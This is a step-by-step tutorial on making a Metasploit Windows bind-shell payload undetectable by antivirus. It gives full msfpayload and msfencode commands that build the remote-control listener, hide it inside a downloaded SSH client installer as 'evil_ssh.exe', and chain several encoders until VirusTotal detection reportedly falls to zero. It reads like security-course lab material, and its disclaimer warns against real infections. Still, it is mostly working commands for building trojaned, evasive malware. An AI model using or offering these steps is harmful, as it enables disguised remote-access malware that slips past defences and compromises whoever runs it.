This tutorial shows, step by step, how to make a virus Fully Undetectable (FUD) by antivirus software. There are many approaches; here we will look at how to make an executable FUD using msfencode.
Requirements
- Metasploit ( Kali Linux )
Attention
We are using harmless test files, but don’t infect people with any real viruses. That would be a crime.
Purpose
Antivirus protects machines from malware, but not from all of it. There are ways to pack malware to make it harder to detect. We'll use Metasploit to render malware completely invisible to antivirus.
Creating a Listener
This is a simple payload that gives the attacker remote control of a machine. It is not a virus and won’t spread, but it is detected by antivirus engines. In Kali Linux, in a Terminal window, execute these commands:
msfpayload windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe
ls -l listen.exe
You should see the listen.exe file, as shown below:
Analyzing the Listener with Virus Total
Click the “Choose File” button. Navigate to /root and double-click listen.exe. “listen.exe” appears in the “Choose File” box, as shown below:
On the VirusTotal web page, click the “Scan it!” button.
If you see a “File already analyzed” message, click the “View last analysis” button.
The analysis shows that many of the antivirus engines detected the file: 37 out of 51 when I did it, as shown below. You may see different numbers, but many of the engines should detect it.
Encoding the Listener
This process will encode the listener and insert it into an innocent SSH file.
In BackTrack/Kali, in a Terminal window, execute these commands:
wget ftp://ftp.ccsf.edu/pub/SSH/sshSecureShellClient-3.2.9.exe
msfencode -i /root/listen.exe -t exe -x /root/sshSecureShellClient-3.2.9.exe -k -o /root/evil_ssh.exe -e x86/shikata_ga_nai -c 1
ls -l evil*
You should see the evil_ssh.exe file, as shown below:
Scan with Virus Total
If you see a “File already analyzed” message, click the “View last analysis” button.
The analysis shows that fewer of the antivirus engines detect the file now: 8 out of 51 when I did it, as shown below. You may see different numbers.
Encode the Listener Again
This process will encode the listener with several different encodings.
In Kali Linux, in a Terminal window, execute these commands:
msfencode -i /root/listen.exe -t raw -o /root/listen2.exe -e x86/shikata_ga_nai -c 1
msfencode -i /root/listen2.exe -t raw -o /root/listen3.exe -e x86/jmp_call_additive -c 1
msfencode -i /root/listen3.exe -t raw -o /root/listen4.exe -e x86/call4_dword_xor -c 1
msfencode -i /root/listen4.exe -o /root/listen5.exe -e x86/shikata_ga_nai -c 1
ls -l listen*
You should see several files, as shown below:
Analyzing Again
The analysis shows that fewer of the antivirus engines detect the file now: 0 out of 51 when I did it, as shown below. You may see different numbers.